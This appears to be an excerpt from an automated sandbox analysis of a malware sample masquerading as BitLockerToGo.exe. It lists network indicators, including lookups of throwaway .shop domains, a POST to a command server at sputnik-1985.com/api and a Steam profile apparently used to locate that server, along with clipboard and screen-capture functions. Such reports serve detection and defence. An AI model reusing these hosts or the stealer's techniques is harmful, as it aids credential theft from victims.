                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
                Source: global traffic | DNS traffic detected: DNS query: bootstringjl.click
                Source: global traffic | DNS traffic detected: DNS query: nearycrepso.shop
                Source: global traffic | DNS traffic detected: DNS query: abruptyopsn.shop
                Source: global traffic | DNS traffic detected: DNS query: wholersorie.shop
                Source: global traffic | DNS traffic detected: DNS query: framekgirus.shop
                Source: global traffic | DNS traffic detected: DNS query: tirepublicerj.shop
                Source: global traffic | DNS traffic detected: DNS query: noisycuttej.shop
                Source: global traffic | DNS traffic detected: DNS query: rabidcowse.shop
                Source: global traffic | DNS traffic detected: DNS query: cloudewahsj.shop
                Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
                Source: unknown | HTTP traffic detected:
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: sputnik-1985.com
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.cssI
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/cssK
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.i
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatiy
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/-
                Source: BitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/8=lw
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
                Source: BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api3
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api;
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apie
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiobH
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apip
                Source: BitLockerToGo.exe, 00000004.00000003.2857839635.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859511619.00000000031A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apitvo
                Source: BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/e
                Source: BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/m
                Source: BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/;
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: BitLockerToGo.exe, 00000004.00000003.2762810768.000000000312A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859436926.0000000003197000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: BitLockerToGo.exe, 00000004.00000003.2800972675.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: BitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49714 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49715 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49716 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49717 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49718 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49719 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49720 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49722 version: TLS 1.2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00421060
